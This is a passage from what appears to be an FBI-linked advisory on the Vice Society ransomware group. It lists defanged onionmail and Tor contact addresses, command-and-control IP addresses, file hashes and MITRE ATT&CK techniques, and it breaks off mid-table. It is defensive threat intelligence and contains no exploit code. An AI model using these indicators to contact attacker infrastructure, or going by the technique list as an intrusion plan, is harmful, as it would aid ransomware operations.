\n\n### Indicators of Compromise (IOCs)\n\n**Email Addresses** \n--- \nv-society.official@onionmail[.]org \nViceSociety@onionmail[.]org \nOnionMail email accounts in the format of [First Name][Last Name]@onionmail[.]org \n \n**TOR Address** \n--- \nhttp://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion \n \n**IP Addresses for C2** | **Confidence Level** \n---|--- \n5.255.99[.]59 | High Confidence \n5.161.136[.]176 | Medium Confidence \n198.252.98[.]184 | Medium Confidence \n194.34.246[.]90 | Low Confidence \n \n_See Table 1 for file hashes obtained from FBI incident response investigations in September 2022._\n\n_Table 1: File Hashes as of September 2022_\n\n**MD5** | **SHA1** \n---|--- \nfb91e471cfa246beb9618e1689f1ae1d | a0ee0761602470e24bcea5f403e8d1e8bfa29832 \n| 3122ea585623531df2e860e7d0df0f25cce39b21 \n| 41dc0ba220f30c70aea019de214eccd650bc6f37 \n| c9c2b6a5b930392b98f132f5395d54947391cb79 \n \n### MITRE ATT&CK TECHNIQUES\n\nVice Society actors have used ATT&CK techniques, similar to Zeppelin techniques, listed in Table 2.\n\n_Table 2: Vice Society Actors ATT&CK Techniques for Enterprise_\n\n**_Initial Access_** \n \n**Technique Title** | **ID** | **Use** \n---|---|--- \nExploit Public-Facing Application | [T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>) | Vice Society actors exploit vulnerabilities in internet-facing systems to gain access to victims\u2019 networks. \nValid Accounts | [T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>) | Vice Society actors obtain initial network access through compromised valid accounts. \n \n**_Execution_** \n \n**Technique Title** | **ID** | **Use** \n---|---|--- \nWindows Management Instrumentation (WMI) | [T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>) | Vice Society actors leverage WMI as a means of \u201cliving off the land\u201d to execute malicious commands. 
WMI is a native Windows administration feature. \nScheduled Task/Job | [T1053](<https://attack.mitre.org/versions/v11/techniques/T1053/>) | Vice Society actors have used malicious files that create component task schedule objects, which are often meant to register a specific task to autostart on system boot. This facilitates recurring execution of their code. \n \n**_Persistence_** \n \n**Technique Title** | **ID** | **Use** \n---|---|--- \nModify System Process | [T1543.003](<https://attack.mitre.org/versions/v11/techniques/T1543/003/>) | Vice So